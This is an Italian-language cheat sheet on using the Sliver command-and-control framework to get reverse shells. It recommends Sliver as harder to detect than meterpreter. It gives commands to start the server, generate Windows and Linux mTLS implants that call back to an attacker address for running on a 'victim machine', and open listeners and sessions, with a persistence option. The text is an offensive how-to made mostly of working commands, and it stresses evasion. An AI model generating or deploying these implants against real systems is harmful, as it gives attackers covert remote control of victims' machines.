tags: reverse_shell Sliver Sliver_Reverse_Shell
Questa shell è superiore a meterpreter sotto diversi aspetti, innanzitutto è più semplice da configurare ed utilizzare ed in secondo luogo è molto più difficile da rilevare perchè è tutto crittografato, per prima cosa dobbiamo avviare il listener che ci permetterà di ottenere una reverse shell e lo possiamo fare con il seguente comando:
sliver-server
#oppure solo:
sliver
Payload Standard
Ora che abbiamo attivato il listener possiamo creare il payload da eseguire sulla macchina vittima, questo è il payload standard che viene rilevato facilmente dai sistemi di difesa:
Windows
generate --mtls 10.0.2.15:8888 --os windows --arch amd64 --format exe --save payload.exeLinux
generate --mtls 10.0.2.15:8888 --os linux --arch amd64 --format elf -s impianto_linuxListeners
Prima di avviare il payload sulla macchina vittima dobbiamo metterci in ascolto con sliver e se per esempio abbiamo utilzzato un payload con mtls ci basterà digitare i seguenti comandi per avviare la sessione:
mtls
sessions
use 12345abc
#Nel caso si avesse difficoltà con porte o indirizzi IP possiamo sempre usare le seguenti flag:
sliver > mtls --help
Start an mTLS listener
Usage:
======
mtls [flags]
Flags:
======
-h, --help display help
-L, --lhost string interface to bind server to
-l, --lport int tcp listen port (default: 8888)
-p, --persistent make persistent across restarts
-t, --timeout int command timeout in seconds (default: 60)
sliver > mtls --lport 4455